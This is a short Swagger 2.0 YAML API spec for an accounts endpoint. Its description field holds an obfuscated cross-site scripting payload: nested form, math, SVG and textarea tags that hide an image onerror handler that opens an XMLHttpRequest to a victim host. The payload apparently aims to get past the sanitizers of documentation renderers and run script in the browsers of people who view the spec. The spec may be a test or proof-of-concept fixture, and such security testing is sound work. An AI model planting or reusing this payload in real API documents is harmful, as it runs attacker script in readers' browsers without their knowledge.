swagger: '2.0'
info:
  title: Example yaml.spec
  description: <form><math><mtext></form><form><mglyph><SvG><mtext><textarea><path id="</textarea><imG/SrC/onx/OneRror="var/**/req=new/**/XMLHttpRequest();req.open('get','https://victim.example.com/endpoint',true);>"></FoRm>
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
